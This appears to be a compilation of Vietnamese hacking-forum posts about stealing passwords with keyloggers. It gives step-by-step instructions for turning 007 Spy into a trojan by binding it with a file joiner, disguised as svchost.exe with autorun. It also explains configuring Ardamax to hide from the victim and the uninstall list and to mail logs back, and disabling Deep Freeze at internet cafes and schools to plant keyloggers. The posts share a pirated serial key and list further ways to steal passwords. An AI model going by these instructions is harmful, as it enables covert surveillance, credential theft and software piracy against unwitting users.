Trích dẫn:
Còn Không Đây Là Anh Chàng Đã Mua.A Commercial Key Logger is a program that captures and logs keystrokes as they are entered on the computer for the purpose of monitoring the user. The logged data, which may be encrypted, is saved or sent to the person who installed the key logger. These applications often run in stealth mode and are invisible to the user that is being monitored. Such key loggers are sold commercially and may be used legitimately if deployed by authorized administrators and disclosed to the persons being monitored, as in a business environment. The use of a key logger to monitor persons without their knowledge has been ruled illegal in at least one jurisdiction.

Download:
File Name: SC_keylogger_V3.2_Full.rar
File Size: 1.51 MB

hzzp://depositfiles.com

Sau khi download p/m SC-Keylogger Pro V3.2 ve cac ban se co 2 file : “scklpro.exe & *****hpscklpro.lic (tuy theo ban goc cua nguoi da mua no chinh hang)
P/m này đã có post trên diễn đàn . Nếu ai tìm ko ra tôi sẽ up lai và post sau .
Kích đôi vào File setup : “scklpro “ .
Giao diện sẽ có như sau :Trích dẫn:
Còn Không Đây Là Anh Chàng Đã Mua.A Commercial Key Logger is a program that captures and logs keystrokes as they are entered on the computer for the purpose of monitoring the user. The logged data, which may be encrypted, is saved or sent to the person who installed the key logger. These applications often run in stealth mode and are invisible to the user that is being monitored. Such key loggers are sold commercially and may be used legitimately if deployed by authorized administrators and disclosed to the persons being monitored, as in a business environment. The use of a key logger to monitor persons without their knowledge has been ruled illegal in at least one jurisdiction.

Download:
File Name: SC_keylogger_V3.2_Full.rar
File Size: 1.51 MB

hzzp://depositfiles.com

Sau khi download p/m SC-Keylogger Pro V3.2 ve cac ban se co 2 file : “scklpro.exe & *****hpscklpro.lic (tuy theo ban goc cua nguoi da mua no chinh hang)
P/m này đã có post trên diễn đàn . Nếu ai tìm ko ra tôi sẽ up lai và post sau .
Kích đôi vào File setup : “scklpro “ .
Giao diện sẽ có như sau :

1-Tấn công trực tiếp :



Đây là một phương pháp cổ điển dùng để dò tìm tên người sử dụng (user) và mật khẩu truy cập của họ (password).Phương pháp này khá đơn giản , dễ thực hiện và không đòi hỏi bất kì một điều kiện nào để bắt đầu.Chúng ta có thể sử dụng những thông tin như tên người dùng , ngày sinh , địa chỉ , số nhà ... để đoán mật khẩu.Trong trường hợp có được có được danh sách người sử dụng (user list ) và môi trường làm việc , một chương trình đoán mật khẩu sẽ được sử dụng. Nó hoạt động một cách tự động bằng cách sử dụng các tổ hợp các từ trong một từ điển lớn và theo những qui tắc mà người dùng định nghĩa.Khả năng thành công của phương pháp này có thể lên đến 30% (nếu bạn may mắn).Và khi thành công ta sẽ có được quyền Admin , Root.

Hai chương trình thường được dùng cho phương pháp này là chương trình Sendmail và Rlogin của hệ thống Unix.



Sendmail là một chương trình phức tạp với mã nguồn bao gồm hàng ngàn dòng lệnh C . Sendmail được chạy với quyền của người quản trị hệ thống do chương trình phải có quyền ghi vào hộp thư của người sử dụng. Vì


Sendmail nhận trực tiếp các yêu cầu về mạng thư tín bên ngoài nên nó trở thành nguồn cung cấp những lỗ hổng bảo mật để truy cập hệ thống.



Rlogin cho phép người sử dụng từ một máy trên mạng truy cập từ xa vào một máy khác sử dụng tài nguyên của máy này. Trong quá trình nhận tên và mật khẩu của người sử dụng , rlogin không kiểm tra độ dài dòng nhập nên ta có thể đưa vào một xâu lệnh đã được tính toán trước để ghi đè lên mã chương trình của Rlogin , từ đó chiếm quyền truy cập.
2-Nghe trộm



Việc nghe trộm thông tin trên mạng có thể đem lại những thông tin có ích như tên , mật khẩu của người sử dụng , các thông tin chuyển qua mạng…Việc nghe trộm thường được các hacker tiến hành sau khi chiếm được quyền truy cập hệ thống thông qua các chương trình cho phép đưa giao tiếp mạng (NIC – Network Interface Card) vào chế độ nhận toàn thông tin lưu truyền trên mạng.Những thông tin này cũng có thể lấy được trên Internet.



3-Giả mạo địa chỉ IP :



Việc này có thể thực hiện thông qua việc dẫn đường trực tiếp.Với các tấn công này , các hacker sẽ gởi các gói tin IP tới mạng bên trong với một địa chỉ IP giả (Thông thường là IP của một mạng hoặc một máy tính được coi là an toàn đối với mạng bên trong) ,đồng thời chỉ rõ đường dẫn má các gói tin IP phải gửi đi.



4-Vô hiệu các chức năng của hệ thống :



Đây là kiểu tấn công làm tê liệt hệ thống , không cho nó thực hiện các chức năng mà nó được thiết kế. Kiểu tấn công này không ngăn chặc được do các phương tiện để tấn công lại chính là những phương tiện để làm việc và truy cập thông tin trên mạng.Ví dụ như sử dụng lệnh ping với tốc độ cao nhất có thể buộc một hệ thống tiêu hao toàn bộ tốc độ tính toán và khả năng của mạng để trả lời các lệnh này , không còn tài nguyên để thực hiện những việc khác.



5-Tấn công vào yếu tố con người :



Hacker có thể già làm người sử dụng , sau đó yêu cầu người quản trị hệ thống thay đổi mật khẩu và quyền truy cập của mình đối với hệ thống hay thay đổi một số cấu hình hệ thống để thực hiện những phương pháp tấn công khác.Không có một thiết bị nào có thể ngăn chặng được phương pháp này ngoài sự cảnh giác của người quản trị hệ thống. (sưu tầm)
ai đã post oài thì sory nha vì 2 lúa mới tham gia nên ko bik hết được.

Biến keylogger thành Trojan (Remote Installation)
Đầu tiên tôi xin hướng dẫn cách biến 007 spy => trojan

007 có 1 số file chính:

“ svchost.exe “ nằm trong thư mục bạn cài, mặc định của nó là
C:\Program Files\Common Files\Microsoft Shared\DAO\
“ winhelp.ini “ nằm trong window
“ comctl32.ocx “ nằm trong thư mục system32
“ msinet.ocx “ nằm trong thư mục system32

Tôi chỉ đưa ra những file cần thiết để 007 có thể hoạt động ổn định

Đầu tiên bạn vào :
www.cobans.net ==> download : micro joiner 1.7

Download 007 Spy Software V3.86 (New)
http://www.e-spy-software.com/download/007ssinstall.exe
or
http://www.keylogger-spy.com/download/007ssinstall.exe
Your RegName::
Lisa R Shapiro Your Registration Key(Serial Number): 122Z018M177W474S511F-1173782669

Cài 007 vào máy trước sau đó mở ra thiết lập , đăng ký sẵn, bạn bỏ chức năng chụp ảnh để nó 007 không báo lỗi do thiếu file( bạn đâu cần chức năng chụp ảnh làm gì cho mệt)

Số đăng ký của 007 sẽ nằm trong winhelp.ini nên bạn ko phải băn khuăn rằng mang số đăng ký của nó đi bằng cách nào

Sau khi cài 007, mở “micro joiner “ cho file vào bằng cách drag and drop hoặc click chuột phải chọn addfile.

Bạn nên để file “ svchost.exe “ ở cuối cùng để bảo đảm nó chạy sau cùng

Mở advand option bằng cách double click vào từng tên file một.

msinet.ocx , comclt.ocx bạn chọn "do not run, system folder,register dll"

winhelp.ini , bạn chọn "do not run, window folder, tất cả các ô trống trong File attributes( để không ai có thể chỉnh được con của bạn)

svchost.exe thì bạn chọn "hidden, add to autorun" và cho nó cài ở đâu tùy bạn

Chú ý: không chọn system folder cho file svchost.exe vì bị trùng tên sẽ không cài được.
Sau đó thì ấn creatfile là bạn có thể có được 1 con 007 tự động cài khi chạy file exe vừa được tạo ra.

Bạn cũng có thể join 1 số file khác và chọn icon cho file
VBBFORUM.COM

hack pass có nhiều cách:
- dùng soft đa phần là keylogger hay Trojan, ... - các soft này cài đặt tại máy victim
- dùng soft tấn công server và lấy thông tin từ server (cách này cao cấp hơn cách trên)
- dùng soft làm cho trang muốn lấy thông tin từ trang đó bị die (DOS hay DDOS) và giả tạo 1 trang như thế trong thời gian trang chính thức bị down và nhận thông tin của victim khi truy cập từ trang đó :D
- có thể suy đoán ra pass của victim theo những thông tin đơn giản như là ngày tháng năm sinh của người đó, họ tên, hay là các có ý nghĩa với người cần lấy pass...
- cách đăng nhập vào các từ khóa đặc biệt để tận dụng lỗi code, cách này chỉ áp dụng cho các trang do các lập trình viên yếu về lập trình và ko rõ qui trình bảo mật, các từ khóa có thể là help, reg, registery, guest, admin, administrator, ... hoặc có thể là các đoạn code do các white hat hacker tìm đc, ...
- ...
Đó là các cách thông dụng, mình xin nói ra để các bạn biết mà phòng tránh :d

THẾ GIỚI KEYLOG RẤT ĐA DẠNG, NHƯNG DƯỚI ĐÂY LÀ MỘT TRONG NHỮNG CON KEYLOG XẾP VÀO LOẠI NGUY HIỂM BẬC NHẤT ĐƯỢC NHIỀU CÁC HACKER SỬ DỤNG NHẤT HIỆN NAY

1)_ Perfect Keylogger V 1.62 con này cool đúng như tên gọi của nó, ngoài ra còn có khả năng ghi bàn phím ảo theo kiểu chụp click chuột chức năng tốt, dùng rất tốt ghi tấn tập chung tấn công 1 mục tiêu xác định, nhưng phân tích đựoc một cái pass click bằng chuột thì hơi oải.(ko qua được tường lửa)

2)_ SC-Keylogger Pro V3.2 về chức năng thì con này tuyệnt nhất, log cũng dễ đọc nhưng mỗi tội hay lỗi khi cài đặt, tỉ lệ thành công là 40% (tùy theo cấu hình của máy v vv......) (ko qua được tường lửa)

3)_ Backlogger 2.0

4)_ 007 Spy Software con này ghi tốt, gửi mail rất ổn định nhưng log của nó hơi khó đọc, ẩn tốt, có khả năng remote intalls nhưng mình chưa thử bao giờ

Hacking Deepfreeze - tại sao không ?. Những lý do khiến bạn "dính" stress và muốn "phá" Deepfreeze:
Bạn muốn cài đặt một phần mềm mới, nhưng cứ khi PC được khởi động lại thì bạn lại "mất hết" và lại "toi cơm" để lẽo đẽo tại lại nó và chờ đợi nhọc cổ mới xong việc.
Bạn muốn cài một chú "Keylogger" nhưng khốn khổ thay cho bạn, làm sao có thể "nặng túi" được khi mà bạn đứng dậy thì biết đâu đấy "anh chàng chủ quán net" lại muốn "tiết kiệm điện và Shutdowns PC?
Bạn muốn dạy cho "quán net" một bài học rằng : Deepfreeze hay Go back có gì mà ghê gớm. Tay không cũng phá được máy?
Cách thứ nhất : Dùng phần mềm DeepUnfreeze
Hữu hiệu và nhanh gọn khi bạn muốn Hacking Deepfreeze của quán Net/trường học mà không biết mật khẩu
Bạn phải biết chính xác phiên bản của Deepfreeze đang cài trên PC thì mới có thể vô hiệu hoá nó bằng phiên bản thích hợp của DeepUnfreeze. VD: Chỉ có thể dùng DeepUnfreeze 1.6 để vô hiệu Deepfreeze phiên bản dưới 5,30,20,1181. Muốn vô hiệu "DeepFreeze Standard Evaluation Version 5.70.021.1453" hay "Deep Freeze 5 Enterprise Workstation Version 5.70.220.1125" thì phải dùng DeepUnfreeze mới hơn 1.6(theo Sailormoon biết thì đã có 1.7 nhưng mình chưa tìm thấy )
Bạn vô Google để tìm kiếm phiên bản mới nhất, hoặc có thể Dowload Deep Unfreeze 1.6 tại đây:
DeepUnfreezerU1.6.exe (http://truongton.net/forum/attachment.php?attachmentid=8662&d=1183726868)<-----Link đã sửa

Vô hiệu hoá Deepfreeze: Chạy file Deep Unfreeze và chọn Boot Thawed on next (1 restarts) .Số lần mặc định là 1, bạn có thể thay đổi là 2,3,.....tuỳ theo số lần PC khởi động lại và bị vô hiệu hoá tương ứng với sô lần bạn chọn. Hoặc bạn có thể chọn "Boot Thawed" để vô hiệu hoá vĩnh viễn Deepfreeze trong mọi lần PC khởi động. Sau đó chọn Load Status và Save Statut. Thoát và khởi động lại PC bạn sẽ thấy Deepfreeze bị vô hiệu hoá.
http://my.opera.com/tuzebra/homes/blog/deepunfreeze1.jpg

Gỡ bỏ hoàn toàn Deepfreezee: Làm như trên. Sau khi khởi động lại máy hãy chạy file cài đặt Deepfreeze tương ứng với bản đã cài đặt vào PC và chọn Uninstall.
Cách thứ hai : Vô hiệu hoá Deefreeze bằng cách thay đổi ngày tháng năm trong BIOS của PC
Khi quán NET/Trường học cài Deepfreeze thường là bản dùng thử hoặc bản dùng chùa nên bạn chỉ cần thay đổi ngày tháng trong BIOS quá khoảng 3 tháng là Deepfreeze hết tác dụng ngay lập tức.
Đối với đa phần các dòng PC thì trước khi hệ điều hành được nạp (ở đây là Windows) bạn chỉ việc nhấn F2 ( Press F2 for Enter Setup). Cũng có thể là nhấn DELETE hoặc PAUSE tuỳ thuộc vào dòng BIOS. Bạn nhìn thấy hướng dẫn này khi máy vừa được bật nên và logo của Windows chưa được load, khi đó màn hình có một vài dòng chữ phía trên cùng và phía dưới cùng. Nếu bạn không nhanh tay bấm F2/DELETE/PAUSE thì bạn phải Reset lại và làm lại.
Sau khi đã thay đổi ngày tháng. VD đổi từ Tuesday, June 13, 2006 sang Tuesday, June 13, 2007. Hãy nhấn F10 để ghi lại và khởi động tiếp PC. Khi đó bạn sẽ thấy Deepfreeze có hình như sau:http://my.opera.com/tuzebra/homes/blog/config_boot_thawed2.jpg

Bạn hãy chạy lại File cài đặt để gỡ bỏ nó. Tiếp sau xoá 2 key của Deepfreeze tại nhánh sau: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion
Cách thứ ba : Phá hoại và thay đổi file hệ thống của Deepfreeze
Với Windows 95/98/me:
Deepfreeze là một trình điều khiển ảo thường trú tại c:\windows\system\iosubsys\persifrz.vxd.
Chỉ có một hy vọng cho hầu hết Hacker khi muốn phá Deepfreeze là khởi động PC
từ đĩa từ và xoá tập tin này đi. Tất cả các tập tin khác tại c:\progra~1\hypert~1\deepfr~1
chỉ là tập tin chương trình.Tập tin bị xoá, persifz.vxd chính là tập tin thực của trình điều khiển
Deepfreeze.Thế nhưng có một sự thật là nếy bạn xoá những tệp tin khác tại thư mục
của Deepfreeze (khi thực hiện khởi động PC từ đĩa mềm) thì Deepfreeze sẽ không
được nạp vào nữa.Tôi vừa chỉ cho bạn một cách tốt và dễ dàng nhất.
Xoá tệp tin persifrz và Deepfreeze sẽ "tắt ngấm" sau khi "ăn" một cú đấm.


Với Windows 2000/XP:
Deepfreeze sẽ gồm 2 drivers và 1 service:
DepFrzLo.sys (kernel driver)
DepFrzHi.sys (filesystem driver)
dfserv.exe (service)
frzstate.exe (password dialog)
persis00.sys (password file and "on/off switch")
Hãy dùng chương trình "NTFSDOSPRO" để ghi đè mật khẩu mới của bạn lên file mật khẩu cũ "persis00.sys" , sau đó đăng nhập vào DeepFreeze với mật khẩu mới này và chọn chế độ Boot Thawed. Tệp tin Persis00.sys bao gồm mật khẩu và on/off switch vào Driver để kiểm tra và chạy khi Wìndows khởi động và máy nạp ở một trong hai trạng thái Thawed mode hay Frozen Mode
Như vậy bạn có thể dễ dàng xoá Files chương trình của DeepFreeze khi Boot PC bằng đĩa khởi động. Bạn có thể dùng chương trình InCtrl5 để loại bỏ những tệp tinh phát sinh do cài đặt Deepfreeze.

Ardamax Keylogger
Download http://ardamax.com/downloads/setup_akl.exe

Sau khi chạy file cài đặt cửa sổ sau hiện lên:
http://k.domaindlx.com/a6pctonline/adra/1.JPG
nhấn I agree để tiếp tục.Sau đó là màn hình:
http://k.domaindlx.com/a6pctonline/adra/2.JPG
Các bạn chọn các thành phần cài đặt:chỉ nên chọn energy builder và logview thôi còn documentation thì chọn cũng được ko cũng được roài bấm Next.1 màn hình như sau hiện ra:
http://k.domaindlx.com/a6pctonline/adra/3.JPG
Chọn thư mục cài đặt :
C:\Program Files\Yahoo!\Messenger
C:\WINDOWS\system
C:\WINDOWS\system32
C:\Program Files\Common Files\Microsoft Shared\DAO
Roài install đợi 1 chút cho nó cài vào máy.Sau khi cài đặt sẽ thấy biểu tượng của adra ở góc phải dưới màn hình
http://k.domaindlx.com/a6pctonline/adra/4.jpg
Để đăng kí click chuột phải chọn Enter registration key
Sẽ hiện ra hộp thoại để điền số serial các bro điền số serial vào như hình dưới:
http://k.domaindlx.com/a6pctonline/adra/5.JPG
Rồi bấm ok 1 hộp thoại hiện ra thông báo bạn đã đăng kí thành công.
Sau khi đăng kí thành công chúng ta sẽ config nó.Bấm chuột phải vào biểu tượng phía dưới bên phải màn hình chọn option .Màn hình setting hiện ra với các tab có tính năng như sau:
General:
Log: Các bạn có thể view các log mà chương trình ghi được open các file log gửi về để xem.Giao diện view log như sau:
http://k.domaindlx.com/a6pctonline/adra/5a.JPG
Bây giờ với view log các bạn có thể phân tích log để tìm ra thông tin mà mình muốn lấy.Log của adra theo mình là dễ phân tích nhất vì nó rất chi tiết.Mới ban đầu khi chưa quen các bạn có thể thấy ngợp vì cả đống hổ lốn chứa trong 1 file log nhưng adra cung cấp cho ta 1 bộ lọc rất mạnh để xử lí vấn đề này,chỉ việc gõ 1 vài từ khóa ta có thể loại bỏ ngay nhưng log ko cần thiết
1 User:cái này là tên acc đang sử dụng máy tính ( ko cần thiết lắm có thể bỏ qua)
2 App:tên chương trình mà log ghi lại.Chúng ta sử dụng để tập trung mục tiêu tới những chương trình cần lấy log.
3 Window Title: tiêu đề cửa sổ ghi log.Cái này cũng rất quan trọng
4 Text:Tìm trong log những từ mà bạn quan tâm
Invisible:Đây là phần quan trọng để giấu adra khi cài trong máy victim.Các bạn config nó như sau:
http://k.domaindlx.com/a6pctonline/adra/6.JPG
Hide tray icon:ẩn icon của adra trên system tray
Hide pro from alt ctrl del: check vào thì dù bạn bấm tổ hợp phím này thì cũng chẳng thấy adra trong list của nó
Remove shortcut from Start:chắc ai cũng bít
Remove from úntall list: check vào nếu bạn muốn victim dù biết máy bị cài key thì cung ko remove nó đi được :D ác thật
Hide pro folder: ẩn folder adra cư ngụ
Hide from startup list: biến mất khải startuo list mà vẫn chạy khi win khởi động
Security: Set pas để mình bạn dùng thoai
http://k.domaindlx.com/a6pctonline/adra/7.JPG
Webupdate: check hết vào để nó tự động tải phiên bản mới về máy
http://k.domaindlx.com/a6pctonline/adra/8.JPG
Option:
http://k.domaindlx.com/a6pctonline/adra/9.JPG
Run on Windows startup:check vào cho nó khởi động cùng win
Start in hiden mode: khởi động với chế độ ẩn
Hide mode on:các bạn qui định phím tắt để gọi adra nhớ chọn khác với mạc định
Self destruc: ấn định ngày nó tự die (chả cần cái này đâu he he)
Deliver:mail để adra gửi log về
Control : chọn phương thức và thành phần gửi về cũng như thời gian gửi log về
http://k.domaindlx.com/a6pctonline/adra/10.JPG
Phần inclue là thành phần log nó gửi về chỉ nên chọn keytrog và log/
Log format:chọn Html để nó gửi về dưới dạng html như vậy máy mình ngồi đọc khỏi cần cài adra.Nhưng tôi thích chọn encrypted hơn dễ phân tích.
Send ony ì log exeed : nếu log lớn hơn chừng này thì nó sẽ gửi về cho mình
Email:khai báo mail để gửi về như sau.Nhó thay địa chỉ mail của bạn địa chỉ trên chỉ là ví dụ mình khuyên các bạn nên xài gmail.Khi điền xong nhớ bấm nút test xem nó có gửi được ko.
http://k.domaindlx.com/a6pctonline/adra/11.JPG
Ftp:nếu muốn upload lên host thì dùng cái này.Hiện nay mình chưa kiếm được host xịn nên chưa thử được host free mà thấy lòg kiểu này là nó blog nick liền.Nhớ chọn log hỗ trợ ftp xài mới được
Networld:cho file log gửi qua mạng nội bộ Lan
Monitorning: chụp ảnh màn hình( cái này chả hữu dụng gì cho lắm nếu muốn xài để bắt bàn phím ảo thì mình khuyên nên dùng perfect keylogger,mình đã post 1 bài về cách này rùi)
Control: ko quan trọng lắm khỏ nói cứ chek hết luôn sắp hết bài roài nhắc quá :D
Screenshot: qui định khoảng thời gian giữa 2 lần chụp màn hình và phạm vi chụp( toàn màn hình hay chỉ cửa sổ hoạt động vào thời gian đó thôi) chất lượng ảnh
http://k.domaindlx.com/a6pctonline/adra/12.JPG



Have fun!!!!!!!!!!!
Phù mệt quá cả đống hình ảnh luôn chắc load chậm lắm,có sai sót gì mong mọi ng` bỏ quá. Pro nào thương em thì oder dùm em 1 cái host nhé để em up mấy cái ảnh :D :D :D[